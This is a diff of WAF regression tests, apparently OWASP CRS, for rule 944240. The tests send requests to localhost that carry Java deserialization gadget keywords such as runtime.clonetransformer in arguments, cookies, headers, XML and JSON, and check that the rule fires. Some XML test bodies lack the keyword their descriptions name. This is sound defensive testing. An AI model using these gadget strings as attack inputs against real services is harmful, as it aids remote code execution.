dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.clonetransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.clonetransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 5 desc: "Request header test includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.clonetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.clonetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 6 desc: "XML attribute value includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 7 desc: "XML element value includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.clonetransformer" + output: + log: + expect_ids: [944240] + - test_id: 8 desc: "Nested XML element value includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.clonetransformer" + output: + log: + expect_ids: [944240] + - test_id: 9 desc: "Content-Type text/plain includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.clonetransformer" + output: + log: + expect_ids: [944240] + - test_id: 10 desc: "Content-Type application/json arg value includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.clonetransformer\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.clonetransformer\"}" + output: + log: + expect_ids: [944240] + - test_id: 11 desc: "Content-Type application/json arg name includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.clonetransformer\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.clonetransformer\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 12 desc: "Argument test includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.forclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.forclosure" + output: + log: + expect_ids: [944240] + - test_id: 13 desc: "Argument name includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.forclosure=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.forclosure=test" + output: + log: + expect_ids: [944240] + - test_id: 14 desc: "Cookie test includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.forclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.forclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 15 desc: "Cookie name includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.forclosure=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.forclosure=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 16 desc: "Request header test includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.forclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.forclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 17 desc: "XML attribute value includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 18 desc: "XML element value includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.forclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.forclosure" + output: + log: + expect_ids: [944240] + - test_id: 19 desc: "Nested XML element value includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.forclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.forclosure" + output: + log: + expect_ids: [944240] + - test_id: 20 desc: "Content-Type text/plain includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.forclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.forclosure" + output: + log: + expect_ids: [944240] + - test_id: 21 desc: "Content-Type application/json arg value includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.forclosure\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.forclosure\"}" + output: + log: + expect_ids: [944240] + - test_id: 22 desc: "Content-Type application/json arg name includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.forclosure\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.forclosure\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 23 desc: "Argument test includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.instantiatefactory" + output: + log: + expect_ids: [944240] + - test_id: 24 desc: "Argument name includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatefactory=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatefactory=test" + output: + log: + expect_ids: [944240] + - test_id: 25 desc: "Cookie test includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.instantiatefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.instantiatefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 26 desc: "Cookie name includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.instantiatefactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.instantiatefactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 27 desc: "Request header test includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.instantiatefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.instantiatefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 28 desc: "XML attribute value includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 29 desc: "XML element value includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatefactory" + output: + log: + expect_ids: [944240] + - test_id: 30 desc: "Nested XML element value includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatefactory" + output: + log: + expect_ids: [944240] + - test_id: 31 desc: "Content-Type text/plain includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-32 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.instantiatefactory" + output: + log: + expect_ids: [944240] + - test_id: 32 desc: "Content-Type application/json arg value includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 